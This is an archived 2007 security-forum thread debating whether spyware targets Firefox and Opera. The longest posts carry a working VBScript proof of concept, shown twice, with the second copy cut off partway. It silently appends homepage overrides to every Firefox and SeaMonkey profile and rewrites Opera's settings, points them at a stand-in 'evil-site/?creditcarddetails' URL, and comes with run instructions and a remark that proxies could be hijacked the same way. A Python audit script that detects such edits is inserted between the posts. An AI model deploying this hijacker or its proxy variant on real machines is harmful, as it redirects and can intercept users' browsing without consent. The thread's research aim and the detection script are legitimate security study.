Is there any malware that affects browsers other than IE?

Discussion in 'malware problems & news' started by vkidv, Jul 14, 2007.

  1. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    Hi,

    Is there any malware in the wild that hijacks non IE browsers when executed? (I do not mean infected from visiting.)

    My curiosity stems from security software features like reset defaults. They only apply to IE but not other browsers. I assumed this is because no spyware targets them, market share too low etc. Firefox has a javascript configuration file and Opera is a windows .ini file. It just feels a bit easy compared to modifying the registry.

    Edit: Realised I posted to wrong place. Sorry! I meant Hijack section not general topics.
     
  2. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,695
    Hello,

    Your question has several layers?

    Is there malware that can affect other browsers?
    Yes, once installed, in Windows, malware can control anything. A non-MS browser could be a target.

    Is there malware that does this?
    Very, very few.

    Is there malware that propagates through other browsers or that can get you infected while you use other browsers?
    Only a few poor proofs of concept, nothing real.

    Answer: Don't use IE and 99% of your problems are solved.

    Mrk
     
  3. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    Thanks for replying.

    I'm not asking if it is possible. I'm asking if there are any wild examples. It just seems like the obvious next step and I'm surprised it isn't as prevalent.
    • Malware manages to run on user's system through a P2P program, a worm, internet explorer
    • The malware is already in, it hijacks internet explorer as its first target. It has nothing to lose by hijacking Firefox or Opera as well.
    • There are fewer products that will alert you if firefox or opera settings change? (I don't know of any)
    • It has nothing to do with the browsers themselves, the security of Opera and Firefox is irrelevant. The attack is coming from the side rather than the front. Defending the door when the attack comes from the window.
     
  4. ASpace

    ASpace Guest

    This is completely wrong. Neither Firefox nor Opera are as safe as they are thought. Just because there are more threats which become more popular because they target the most popular web-browser does not mean that avoiding IE changes everything. Both Firefox and Opera have security issues, too, and their problems are fixed just like those in IE because if not they will immediately become victims of threats.

    Version 7 of Internet Explorer is much more secure than previous versions of itself and it is easily noticeable for its users. Vista's IE7 is better than any other because of Protected Mode. Just notice people, since they upgraded there are much less complaints of browser hijack of IE (on the forums/newsgroups or real world)

    In my view, all latest browsers are equally secure when run on Windows NT/2000/2003/XP (e.g. MS Windows IE7 = Mozilla Firefox). Vista makes IE7 the most secure on it because of User Account Control and Protected mode (you can learn more about them on the internet) :thumb:
     
  5. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,695
    Hello,

    Firefox and Opera have no issues. Show me one, ONE example. Real-life example. ONE.

    It says Microsoft fan in your sig ...

    Mrk
     
  6. tisungho

    tisungho Registered Member

    Joined:
    May 27, 2007
    Posts:
    148
    Hello, properly off topic!

    I like some add-ons of FF like Adblock, Noscript to avoid Ads and Popup. Do you know any ones similar to them? I used IE7Pro, but it doesn't block popup.

    Regards,
     
  7. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    This was the answer I was expecting.

    I do not mean while running Opera or Firefox. I'm wondering if there are any real life wild malwares that hijack them from the outside. As I've mentioned, Opera uses an .ini file and firefox uses a .js file.

    Which would require more permissions? Writing to the registry for IE or writing to an INI file or writing to that js file? Probably the registry, because both files are in Application Data per user profile.

    As soon as malware code runs, you have already lost. Opera and Firefox can be the most secure browsers in the world. It doesn't matter if the spyware runs from elsewhere. They are not running so they cannot protect themselves.

    EDIT: He may have Microsoft fan in his signature but you have Linux fanboyism in yours :( You also lose points for using the word 'pwn'...
     
  8. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,695
    Hello,

    Linux and fanboyism do not go together well. More like, efficiency and enlightenment? Fanboy means endorsing something without rational justification. Endorsing Linux is simply logical, like drinking orange juice in hot summer or turning up air conditioning in your car in Florida. You would not call anyone doing that a fanboy?

    While I do oppose the usage of l77t terminology in general terms, sometimes its usage is of great assistance when a significant message needs be delivered with minimal use of words. In this regard, the language of the impatient neo-nerds is of utmost use.

    Hence, pwn delivers the punch far more efficiently than, let's say, obliterate or humiliate. And I do sincerely apologize for using efficient more than once in the post.

    Cheers,
    Mrk
     
  9. TairikuOkami

    TairikuOkami Registered Member

    Joined:
    Oct 10, 2005
    Posts:
    2,509
    Location:
    Slovakia
    It is easy to create e.g. a DLL injection for any browser, only HIPS can prevent it, not a browser, but IE is the logical choice, simply because it is in every Windows. It would be silly to create it e.g. for FF only, because it would affect only about 15% instead of 99%. So using other browsers, anything but IE, will improve your security for sure. In real life, it does not matter that FF2 has more vulnerabilities than IE7, it is about who the hackers are pointed at, and for now, it is IE. ;)


    Simply put, do as Mrkvonic said: Don't use IE and block it in your firewall, so it would not leak if it were infected and silently launched by malware.
     
  10. ASpace

    ASpace Guest

  11. Ice_Czar

    Ice_Czar Registered Member

    Joined:
    May 21, 2002
    Posts:
    696
    Location:
    Boulder Colorado

    rather than possibilities, consider probabilities
    a serious bit of malicious code slips into your box, it's undetected
    now why would the author want to notify the victim they are compromised by hijacking the browsers? They are more interested in making money, they might try to automatically harvest info from browser caches, then slave you to a bot net, drop a few back doors, even a very slim chance of an actual first person looksee if you're from an interesting IP block, but tipping their hand with an obvious hijack wouldn't be very likely at all.

    if they have root they can do anything
    (rape your dog, burn down your house, steal your car :p )
    a lot of hijacking is about driving traffic to a portal for further and more serious exploitation
    but if you're already compromised to the extent you suggest, there is no need for that

    while we are reviewing malicious motivation, the classic arguments of the Win\Nix debates
    1. crafting malicious code for the greatest return on investment > Windows
    (a secretive OS replete with an army of idiot users)
    2. crafting malicious code for the OS you know > Linux
    (a free OS readily available throughout the economically challenged nurseries of malware hotspots, but typically with a poor ROI when it comes to end users and generally needs a lazy admin to succeed, damage can be extensive however because of the prevalence of LAMP (a couple of popular compromised servers can then serve up a lot of Windows exploits to unpatched idiots))

    as far as browsers, the same motivational logic applies
    and the browser is very often the leading vector for infection
    history has not been kind when you combine the two
    IE has historically been the biggest pain in the butt to Microsoft when it comes to security
    what is important isn't the number of vulnerabilities, but rather the ones that lead to critical system access and how long till they are patched, critical system access through an alternative browser is rare (and is generally a system flaw also found in IE) but more importantly Firefox has kept patching ahead of the in the wild exploits far far better than IE

    http://secunia.com/product/11/?task=statistics (IE 6)
    http://secunia.com/product/12366/?task=statistics (IE 7)

    http://secunia.com/product/4227/?task=statistics (FF 1.X)
    http://secunia.com/product/12434/?task=statistics (FF 2.X)

    (a simple comparison of how much red you see will do)

    when it's all said and done, the question isn't can an OS or browser be secured
    (they can't all the time) but rather how large a window of serious vulnerability will the average idiot experience
    (and if you're running Linux you're not average, though I'm proof an idiot can do it :p )
    however today I'm on my W2K box w\ FF 2.0.0.4

    Firefox on Linux was immune (as are the rest)
    and Microsoft knew about the ANI bug in December

    statement also assumes that the default DEP settings have been altered, precluding the average idiot
    protected mode is effective, but only if it's turned on. Intrusive security is typically unused security.
    I would point out it's Microsoft that is dragging its heels to extend protected mode information to Mozilla, not the other way round from what I can tell.

    if you want to slam Firefox, at least use the right ammunition :p

    http://secunia.com/advisories/25984/
     
    Last edited: Jul 15, 2007
  12. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    Right I don't think anybody understood my question. That's okay, I wasn't very clear.

    To clarify, when I say malware I actually mean: spyware, adware, crapware...Anything that tries to hijack you..

    I'll answer it myself.

    Yes. There is a script that can hijack your Opera and Firefox homepage webpage. I know this because I've just written it.


    My visual basic script can be run from limited user mode. Visual Basic Scripts have less power than full blown applications.

    Opera is an .ini file in the user directory and can be modified by anything that runs from the user. Firefox uses a javascript file.
    • My firewall is Comodo Personal Firewall Pro (free version). It doesn't seem to notice anything.
    • HijackThis doesn't see any changes.
    • This could be used to leak information. Assuming I have set my firewall to allow Firefox or Opera to access information - it will -- through query strings in the URL.

    This could be modified to change practically any value in about:config in firefox or opera:config in Opera. Proxy configuration is exposed by these configuration files. One who was serious about hijacking someone's machine or sniffing someone could configure a proxy for these browsers -- while in user mode.

    This is my script.
    Code:
    '' change homepages of alternative browsers
    '' written by vkidv, July 2007
    '' tested under limited user in windows xp sp2
    
    Dim fso : Set fso = CreateObject("Scripting.FileSystemObject")
    Set WShell = CreateObject("WScript.Shell")
    Const ForReading = 1, ForWriting = 2, ForAppending = 8, TRISTATE_FALSE = 0
    
    DefaultHomepage = "http://evil-site/?creditcarddetails"
    
    CloseIt = " is open and needs to be closed..."
    
    Function isOpen(strProcess)
    '' code following is from script center technet converted into function for conveniency
      strComputer = "."
    Set objWMIService = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    Set colProcesses = objWMIService.ExecQuery _
        ("Select * from Win32_Process Where Name = '"& strProcess &"'")
    
      If colProcesses.Count = 0 Then
          isOpen = False
      Else
          isOpen = True
      End If
      
      Set objWMIService = Nothing
      Set colProcesses = Nothing
    End Function
    
      If Not isOpen("firefox.exe") Then
        Firefox GetNewHomepageFor("Firefox")
      End If
      If Not isOpen("Opera.exe") Then
        Opera GetNewHomepageFor("Opera")
      End If
    
    
    Function GetNewHomepageFor(strFor) 
      If WScript.Arguments.Count = 1 Then
        GetHomepage = WScript.Arguments(0)
      Else
        Specify = InputBox("WARNING: Current homepage for " & strFor & " will be overwritten with the following homepage. Cancel to stop.","New homepage for " & strFor, DefaultHomepage)
        If Specify <> vbEmpty Then
          GetNewHomepageFor = Specify
          DefaultHomepage = Specify
        Else Wscript.Quit(-1)
        End If
      End IF
    End Function
    
    Sub Opera(strURL)
    '' changes opera homepage
      OperaDir = "%APPDATA%\Opera\Opera\profile\"
      OperaDir = WShell.ExpandEnvironmentStrings(OperaDir)
      
      If fso.FolderExists(OperaDir) Then
        WScript.Echo "Opera homepage changed to " & strURL
        WriteIni OperaDir&"opera6.ini","User Prefs","Home URL",strURL
      End If
    End Sub
    
    Sub Firefox(strURL)
      
      ProfileDir = "%APPDATA%\Mozilla\Firefox\"
      ProfileDir = WShell.ExpandEnvironmentStrings(ProfileDir)
      
      profile_count = 0
      
      Do Until iReturn = 2
        Profile = GetINI(ProfileDir & "profiles.ini","Profile" & profile_count,"Path", "", iReturn)
      If iReturn = 2 Then Exit Do
        
        Profile = Replace(Profile,"/","\")
        WScript.Echo "Firefox homepage for " & Profile & " changed to " & strURL
        Profile = ProfileDir & Profile
        Set FireConfig = fso.OpenTextFile(Profile & "\prefs.js", 8)
        FireConfig.WriteLine("user_pref('browser.startup.homepage','" & strURL & "'); // i am maliciously added)")
            
        profile_count = profile_count + 1
      Loop
    End Sub
    
    '' FOLLOWING CODE IS NOT AUTHORED BY ME
    '' OBTAINED FROM http://mystuff.clarke.co.nz/MyStuff/vbsstuff.asp?func=CreateTempFile&Title=Generate%20a%20filename%20and%20path%20for%20a%20working%20file%20in%20the%20%25temp%25%20directory#CreateTempFile
    '' very useful, thankyou
    
    Function DeleteFile(strFiletoDelete)
        if fso.FileExists(strFiletoDelete) then
            set f=fso.GetFile(strFiletoDelete)
            f.attributes = 0 
            f.Delete True 
        end if
    End Function
    
    Function GetINI(str_FileName,str_SectionName,str_ItemName, sDefault, iReturn)
      'iReturn : 1 = File not found
      ' 2 = Section not found
      ' 3 = Item not found 
      Dim sTEMP, myFile, strFileName, strSectionName, strItemName
      iReturn=0 
      strFileName=str_FileName
      strSectionName=str_SectionName
      strItemName=str_ItemName
      GetINI = sDefault
    
      strFileName=Trim(strFileName)
      strSectionName=Trim(strSectionName)
      strItemName=Trim(strItemName)
    
      If Left(strSectionName,1) <> "[" Then
        strSectionName="[" + strSectionName
      End If 
    
      If Right(strSectionName,1) <> "]" Then
        strSectionName=strSectionName + "]"
      End If 
    
      If Not fso.fileexists(strFileName) Then
        iReturn = 1
        Exit Function
      End If 
    
      Set MyFile = fso.OpenTextFile(strFileName, ForReading)
      'Detect Empty File
      If myfile.AtEndOfStream Then
        MyFile.Close
        Exit Function 
      End If
      Do
        sTEMP = Trim(MyFile.ReadLine)
        If Left(sTEMP,1) = ";" Then ' ignore a line that start with a ";"
          sTEMP=""
        End If
      Loop Until myfile.AtEndOfStream Or (InStr(UCase(sTEMP),UCase(strSectionName)) = 1) 
    
      If myfile.AtEndOfStream Then
        iReturn = 2
        MyFile.Close
        Exit Function 
      End If 
    
      Do
        sTEMP = Trim(MyFile.ReadLine)
        If Left(sTEMP,1) = ";" Then ' ignore a line that start with a ";"
          sTEMP=""
        End If
        If InStr(UCase(sTEMP),"[") = 1 Then ' Start of next section
          iReturn = 3
          MyFile.Close
          Exit Function 
        End If
      Loop Until myfile.AtEndOfStream Or (InStr(UCase(sTEMP),UCase(strItemName)) = 1) 
    
      MyFile.Close
    
      If (InStr(UCase(sTEMP),UCase(strItemName)) <> 1) Then
        iReturn = 3
        Exit Function 
      End If 
    
      sTEMP=Trim(Right(sTEMP,Len(sTEMP) - (InStr(sTEMP,"="))))
    
      If InStr(sTEMP,";") <> 0 Then ' Check for "on the line" comments
        sTEMP=Trim(Left(sTEMP,InStr(sTEMP,";")-1))
      End If
    
      If sTEMP <> "" Then : GetINI=sTEMP
    End Function 
    
    Function GenerateTempFileName 
        Const TEMPORARY_FOLDER = 2
        Dim fso : Set fso = CreateObject("Scripting.FileSystemObject")
        Dim tfolder, tname
        Set tfolder = fso.GetSpecialFolder(TEMPORARY_FOLDER)
        tname = fso.GetTempName 
        GenerateTempFileName = tfolder & "\" & tname 
    End Function 
    
    
    Function WriteIni(strFileName, strSection, strItem, strValue)
      Dim bSectionExists, bInSection, bItemExists, bwrote, strPath, strline, strUcaseLine, iReturn, tfSourceINI, tfDestINI, strWorkingFile, aX, sLeftofEquals
    
      strWorkingFile=GenerateTempFileName
      DeleteFile(strWorkingFile) ' Delete the temporary file if it exists
      bInSection = False
      bSectionExists = False
      GetINI strFileName, strSection, strItem,"",iReturn
      if iReturn = 0 then
        bItemExists = TRUE
      else
        bItemExists = FALSE
      end if
      bwrote = False
      Err.Clear
      Set tfSourceINI = fso.OpenTextFile(strFileName, ForReading, True)
      Set tfDestINI = fso.OpenTextFile(strWorkingFile, ForWriting, True, TRISTATE_FALSE)
      If Err.Number <> 0 Then
        DeleteFile(strWorkingFile) 
        Set tfSourceINI = Nothing
        Set tfDestINI = Nothing
        WriteIni = False
        Exit Function
      End If
      While tfSourceINI.AtEndOfStream = False
        strline = Trim(tfSourceINI.ReadLine)
        strUcaseLine = UCase(strline)
        sLeftofEquals = strUcaseLine 
        if Len(strUcaseLine) > 1 then
          aX = Split(strUcaseLine,"=") ' Split up the string at the "=" 
          sLeftofEquals = Trim(aX(0)) ' Get the left most bit 
        end if
        If bwrote = False Then
          If strUcaseLine = UCase("[" & strSection & "]") Then
          bSectionExists = True
          bInSection = True
          ElseIf InStr(strline, "[") = 1 Then
            bInSection = False
          End If
        End If
    
        If bInSection Then 
          If bItemExists = False Then
            tfDestINI.WriteLine strline
            if len(strValue) => 1 then ' Don't write item out if Value is empty
              tfDestINI.WriteLine strItem & "=" & strValue
            end if 
            bwrote = True
            bInSection = False
          ElseIf sLeftofEquals = UCase(strItem) Then
            if len(strValue) => 1 then ' Don't write item out if Value is empty
              tfDestINI.WriteLine strItem & "=" & strValue
            end if 
            bwrote = True
            bInSection = False
          Else
            tfDestINI.WriteLine strline
          End If
        Else
          tfDestINI.WriteLine strline
        End If
      Wend
      If bSectionExists = False Then ' strSection doesn't exist
        tfDestINI.WriteLine
        tfDestINI.WriteLine "[" & strSection & "]"
        tfDestINI.WriteLine strItem & "=" & strValue
      End If
    
      tfSourceINI.Close
      tfDestINI.Close
      If Err.Number = 0 Then
        fso.DeleteFile strfilename
        fso.CopyFile strWorkingFile , strFilename
        DeleteFile(strWorkingFile)
        WriteIni = True
      Else
        DeleteFile(strWorkingFile)
        WriteIni = False
      End If
      Set tfSourceINI = Nothing
      Set tfDestINI = Nothing
    End Function 
    
    Instructions: Save as .vbs file, run with wscript by double clicking, or cscript filename [page to set to]
    Run have installed firefox and/or Opera.
    Please note
    • The script attempts to change every Mozilla profile's homepage.
    • Opera and/or firefox must be closed for the script to work. It will not try if they are open.
    • Even if Mozilla firefox has a homepage set somewhere else in the configuration, this will override it because it is set afterward. Upon close, firefox will save only the last set homepage in the file.

    If you have VBS files blocked, that is not the point. Not many permissions seem to be required to make the pages that this script does.

    If I've overlooked anything (I have a feeling I have) please tell me. I might be missing something obvious.
     
    Last edited: Jul 16, 2007
  13. munckman

    munckman Registered Member

    Joined:
    May 2, 2002
    Posts:
    100
    Thanks vkidv,

    It certainly changed my Firefox homepage. When starting ff, I was presented with something about cannot find server evil-site. My homepage was about:blank prior to allowing the script to run.

    I understand that you are not concerned about users allowing the script to run but how can this be used to hijack a browser otherwise? I think that I don't know enough.

    Thanks
     
  14. herbalist

    herbalist Guest

    VB scripts run from the desktop aren't testing the browser. They're run by Windows Scripting Host, which is not governed by browser settings. On my setup, Script Sentry intercepts this script, allowing me to view it before deciding if I want it to run. I allowed WScript to execute it (intercepted by SSM), I just get an error message. "File or class name not found.."

    This is more of a test of the user and of how well your defenses against script files are set up.

    Vulnerabilities that allow changes to a system or a malicious install are found on occasion in alternate browsers on rare occasion and get fixed pretty quickly. IE6 has some actively exploited vulnerability waiting to be patched on more days than it doesn't. As far as IE7 is concerned, give it time. It will be compromised like all Microsoft browsers.

    Do you expect any different at a security forum? Everybody has their favorite systems, apps, etc.

    Rick
     
  15. herbalist

    herbalist Guest

    Instead of a non-existent test page, it would change it to a page that attempts to install to your system or attempts some other malicious activity. It's a way to get you to a site you wouldn't go to otherwise.
    Rick
     
  16. ASpace

    ASpace Guest

    Being a fan of something/somebody means you like it/them . There is a reason , at least for me , to like the companies written in my signature -they are all the qualities of theirs and the people working there. What I tell/write is not written just because "I am their fan" . I am neither blind nor deaf , I can realise what is going on around me and if my favourites start going down I can change them but nothing can make me do it if they stay that way .

    You all understand wrong the word "fan" and only speculate with it!!!
    Is there anything wrong I have written in this thread?! I don't think so


    Edit... and if you want to know , I do run only IE on my main system(s) but I use Firefox2 on my test computer because it is XP SP1 (not updated to SP2) , Firefox will "protect" better because it can be updated , IE6 SP1 is not updatable at all .
     
    Last edited by a moderator: Jul 23, 2007
  17. SirMalware

    SirMalware Registered Member

    Joined:
    Jun 6, 2006
    Posts:
    133
    Both Opera and Mozilla do not use Browser Helper Objects or ActiveX, common targets of malware code writers. Security issues or not, with an admin user account in Windows and heavy usage of IE, you're a HijackThis log just waiting to happen.
     
  18. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    Hello, thank you for your responses.

    My script isn't a test of the browsers defence while running. Instead, while they are not running, they are sitting ducks. I was curious why they are not currently targeted by spyware. My post title is: "Is there any malware that affects browsers other than IE?".
    munckman, my stance is that if malware or spyware enters from some avenue such as P2P or Internet Explorer, it has nothing to lose by attaching itself to Firefox and Opera. This is because it has already won the battle - the battle to be executed by the machine.

    I thought there was a reason why. I tried myself and there is no technical reason. I can only assume the reason why is that there is not much advantage in attaching to Opera or Firefox because they represent a small marketshare.

    herbalist, you may have found a bug... Do you have Firefox and/or Opera installed? I may have made an assumption that wasn't obvious in my installation.

    As for HijackThis. I want HijackThis and other browsers to display the settings of firefox, opera and other browsers. There might be no real wild malware but if it is as easy as hijacking Internet Explorer...

    ---
    Off topic:

    There is innocence in saying "Microsoft fan" like that of saying you like a certain tv show or book fan. Being a fan is expressing yourself. For example, "Harry Potter fan". This is because I read and enjoy Harry Potter.

    My problem comes when fan becomes fanboyism. This occurred in this topic when someone entered singling an enemy fan camp out.
    EDIT: The quote in question:
    The ellipsis represents what? Dismissal?
    You do not single out an irrelevant detail to use as a weapon in argument. The fanboyism became apparent when usage of memes like 'pwn' and the questionable statement that Linux pwns Vista.


    An example of fictional fanboyism: For example, Harry Potter pwns Lord of the Rings.
    • Who cares if he is a Microsoft fan?
    • Who cares if he is a Linux fan?
    • I don't
    • I care when the Linux fan uses the fact of being a Microsoft fan as a weapon. That is simply not right. Doing so is just asking for arguments.
    Wow. This thread is amazing. I've managed to pull Opera, Firefox and Internet Explorer rivalry plus Windows and Linux. I apologise.
     
    Last edited: Jul 24, 2007
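
A read-only audit of the files this thread discusses, as an added example that is not part of any post: it lists the homepage and proxy preferences a profile will actually use and flags `prefs.js` lines that look appended rather than written by the browser. The paths, the pref name and the `[User Prefs]` / `Home URL` key are the ones in the posted script; the `network.proxy.` prefix, the quoting and trailing-text heuristics, and the sample file contents are assumptions constructed for illustration.

```python
"""Audit Firefox-style prefs.js and Opera opera6.ini for hijack-relevant settings."""
import configparser
import os
import re
from pathlib import Path

# user_pref("name", value);  Assumption: the browser writes double-quoted names
# and nothing after the semicolon, so other shapes are worth a second look.
PREF_RE = re.compile(
    r"""^\s*user_pref\(\s*(?P<q>["'])(?P<name>.+?)(?P=q)\s*,\s*"""
    r"""(?P<value>"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'|[^,)\s]+)\s*\)\s*;(?P<tail>.*)$"""
)

def is_watched(name):
    """Start page plus anything under network.proxy. (proxy settings)."""
    return name == "browser.startup.homepage" or name.startswith("network.proxy.")

def audit_prefs_js(text):
    """Return (effective, findings); the last assignment of a pref wins."""
    effective, findings, seen = {}, [], {}
    for lineno, line in enumerate(text.splitlines(), 1):
        m = PREF_RE.match(line)
        if not m or not is_watched(m["name"]):
            continue
        name = m["name"]
        if m["q"] == "'":
            findings.append((lineno, name, "single-quoted pref name"))
        if m["tail"].strip():
            findings.append((lineno, name, "text after the closing ';'"))
        if name in seen:
            findings.append((lineno, name, f"overrides line {seen[name]}"))
        seen[name] = lineno
        effective[name] = m["value"].strip("\"'")
    return effective, findings

def firefox_profile_dirs(root):
    """Resolve every [ProfileN] Path= entry in <root>/profiles.ini."""
    ini = configparser.ConfigParser(interpolation=None)
    ini.read(Path(root) / "profiles.ini")
    dirs = []
    for section in ini.sections():
        if section.lower().startswith("profile") and ini.has_option(section, "Path"):
            path = Path(ini[section]["Path"].replace("\\", "/"))
            relative = ini[section].get("IsRelative", "1") == "1"
            dirs.append(Path(root) / path if relative else path)
    return dirs

def read_ini_values(text, watched=(("User Prefs", "Home URL"),)):
    """Small INI reader that tolerates a header line before the first section."""
    wanted = {(s.lower(), k.lower()) for s, k in watched}
    section, out = None, {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            if (section, key.strip().lower()) in wanted:
                out[(section, key.strip().lower())] = value.strip()
    return out

def changed_since(baseline, effective):
    """Map pref -> (baseline value, current value) for every difference."""
    return {k: (baseline.get(k), v) for k, v in effective.items()
            if baseline.get(k) != v}

# Constructed sample: a normal prefs.js with one line appended in the style
# of the script posted in this thread.
SAMPLE_PREFS = '''\
# Mozilla User Preferences
user_pref("browser.startup.homepage", "about:blank");
user_pref("network.proxy.type", 0);
user_pref('browser.startup.homepage','http://evil-site/?creditcarddetails'); // i am maliciously added)
'''

# Constructed sample opera6.ini; the header line is an assumption.
SAMPLE_OPERA = """\
Opera Preferences version 2.1
; Do not edit this file while Opera is running

[User Prefs]
Home URL=http://evil-site/?creditcarddetails
"""

if __name__ == "__main__":
    appdata = os.environ.get("APPDATA")
    if appdata:
        for profile in firefox_profile_dirs(Path(appdata) / "Mozilla" / "Firefox"):
            prefs = profile / "prefs.js"
            if prefs.is_file():
                eff, notes = audit_prefs_js(prefs.read_text(errors="replace"))
                print(prefs, eff, notes, sep="\n  ")
        opera = Path(appdata) / "Opera" / "Opera" / "profile" / "opera6.ini"
        if opera.is_file():
            print(opera, read_ini_values(opera.read_text(errors="replace")))
    else:
        print(audit_prefs_js(SAMPLE_PREFS))
        print(read_ini_values(SAMPLE_OPERA))
```

Saving the `effective` dictionary from a known-good run and passing it to `changed_since` on later runs gives the settings-change alert the thread notes is missing for these browsers.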
  19. lu_chin

    lu_chin Registered Member

    Joined:
    Oct 27, 2005
    Posts:
    294
    I think as you said if a piece of malware had entered and got executed on a PC, its battle was already won. The damage could be so much and deep into the system that targeting any browsers at this point would not be much of a return of interest. A rootkit might be fully functional without the need to work through any browsers on an infected PC. Even simply changing the HOST file would be another venue to affect systemwide connections, etc.

     
  20. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    Of course :)

    I will now explicitly say that I mean:
    adware
    spyware
    crapware
    I mean malware but without all the viruses/trojans/worms that tend not to mess about with your browser settings.

    I tend to lump them all into one term because they're all malicious. Sorry :oops:
     
  21. herbalist

    herbalist Guest

    I'm using Sea Monkey as my default browser, previously known as the Mozilla Suite. No Opera or FF installed. Never really liked the look or feel of FireFox. By any chance, were you assuming XP or another NT operating system? I was hoping it would work as I wanted to see if my SSM rules for wscript.exe would also block it.

    HiTech Boy,
    All I said is that it's expected for people at a place like this to have favorite apps, operating systems, etc, and to list them in a signature. I don't know what you read into that statement, but that's all I said.

    Rick
     
  22. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    I've used Mozilla in the past (before the rename) and preferred it to Firefox, too.

    I'm installing it now...

    Right. SeaMonkey uses different folder. That might explain your 'file not found' error herbalist! Thanks for your help. I have amended the script to change SeaMonkey's homepage too.

    I am using Windows XP. If you are using Windows 98 as your avatar says, I have no idea whether it will work or not. Please let me know with the amended script!

    If anybody gets any errors please say so!

    NOTE This will change all of your profile's homepages...for good measure! This aggression would probably be utilized in real malware so I have intentionally not hardcoded it.

    Code:
    '' change homepages of alternative browsers
    '' written by vkidv, July 2007
    '' tested under limited user in windows xp sp2
    '' version +1, amended 26 July 2007
    '' firefox, opera and seamonkey
    
    Dim fso : Set fso = CreateObject("Scripting.FileSystemObject")
    Set WShell = CreateObject("WScript.Shell")
    Const ForReading = 1, ForWriting = 2, ForAppending = 8, TRISTATE_FALSE = 0
    
    DefaultHomepage = "http://evil-site/?creditcarddetails"
    ' this intentionally doesn't resolve to demonstrate
    
    CloseIt = " is open and needs to be closed..."
    
    Function isOpen(strProcess)
    '' code following is from script center technet converted into function for conveniency
      strComputer = "."
    Set objWMIService = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    Set colProcesses = objWMIService.ExecQuery _
        ("Select * from Win32_Process Where Name = '"& strProcess &"'")
    
      If colProcesses.Count = 0 Then
          isOpen = False
      Else
          isOpen = True
      End If
      
      Set objWMIService = Nothing
      Set colProcesses = Nothing
    End Function
    
      If Not isOpen("firefox.exe") Then
        NewHomepage = GetNewHomepageFor("Firefox") 
        If NewHomepage <> False Then Firefox NewHomepage
      End If
      
      If Not isOpen("Opera.exe") Then
        NewHomepage = GetNewHomepageFor("Opera")
        If NewHomepage <> False Then Opera NewHomepage
      End If
      
      If Not isOpen("seamonkey.exe") Then
        NewHomepage = GetNewHomepageFor("SeaMonkey")
        If NewHomepage <> False Then SeaMonkey NewHomepage
      End If
    
    Function GetNewHomepageFor(strFor) 
      If WScript.Arguments.Count = 1 Then
        GetNewHomepageFor = WScript.Arguments(0)
      Else
        Specify = InputBox("WARNING: Current homepage for " & strFor & " will be overwritten with the following homepage. Cancel to stop.","New homepage for " & strFor, DefaultHomepage)
        If Specify <> vbEmpty Then
          DefaultHomepage = Specify
          GetNewHomepageFor = Specify
        Else
          GetNewHomepageFor = False
        End If
      End IF
    End Function
    
    Sub Opera(strURL)
    '' changes opera homepage
      OperaDir = "%APPDATA%\Opera\Opera\profile\"
      OperaDir = WShell.ExpandEnvironmentStrings(OperaDir)
      
      If fso.FolderExists(OperaDir) Then
        WScript.Echo "Opera homepage changed to " & strURL
        WriteIni OperaDir&"opera6.ini","User Prefs","Home URL",strURL
      End If
    End Sub
    
    Sub Firefox(strURL)
      
      ProfileDir = "%APPDATA%\Mozilla\Firefox\"
      ProfileDir = WShell.ExpandEnvironmentStrings(ProfileDir)
      
      profile_count = 0
      Completion = ""
      
      Do Until iReturn = 2
        Profile = GetINI(ProfileDir & "profiles.ini","Profile" & profile_count,"Path", "", iReturn)
        If iReturn = 2 Then Exit Do
        
        Profile = Replace(Profile,"/","\")
        Completion = Completion & "Firefox homepage for '" & Profile & "' changed to " & strURL
        Profile = ProfileDir & Profile
        Set FireConfig = fso.OpenTextFile(Profile & "\prefs.js", ForAppending)
        FireConfig.WriteLine("user_pref('browser.startup.homepage','" & strURL & "'); // i am maliciously added)")
            
        profile_count = profile_count + 1
      Loop
      
      If Len(Completion) > 0 Then WScript.Echo Completion
      Set Completion = Nothing
      
    End Sub
    
    Sub SeaMonkey(strURL)
      ProfileDir = "%APPDATA%\Mozilla\Profiles\"
      ProfileDir = WShell.ExpandEnvironmentStrings(ProfileDir)
      
      Set ProfileDir = fso.GetFolder(ProfileDir)
      
      Completion = ""
      For Each NamedProfile in ProfileDir.SubFolders
      ' the user-named profiles
        
        For Each Profile in NamedProfile.SubFolders
          If fso.FileExists(Profile.Path & "\prefs.js") Then
            Completion = Completion & "SeaMonkey homepage for profile named '" & NamedProfile.Name & "'' changed to " & strURL & vbNewLine
            SeaMonkeyProfile Profile.Path,strURL
            Exit For ' we found the profile file so we can stop
          End If
        Next
      Next
      
      If Len(Completion) > 0 Then WScript.Echo Completion
      Set Completion = Nothing
    
    End Sub
    
    Sub SeaMonkeyProfile(Profile,strURL)
      
      Set SeaConfig = fso.OpenTextFile(Profile & "\prefs.js", ForAppending)
        SeaConfig.WriteLine("user_pref('browser.startup.homepage','" & strURL & "'); // i am maliciously added)")
      Set SeaConfig = Nothing
      
    End Sub
    
    '' FOLLOWING CODE IS NOT AUTHORED BY ME
    '' OBTAINED FROM http://mystuff.clarke.co.nz/MyStuff/vbsstuff.asp?func=CreateTempFile&Title=Generate%20a%20filename%20and%20path%20for%20a%20working%20file%20in%20the%20%25temp%25%20directory#CreateTempFile
    '' very useful, thankyou
    
    Function DeleteFile(strFiletoDelete)
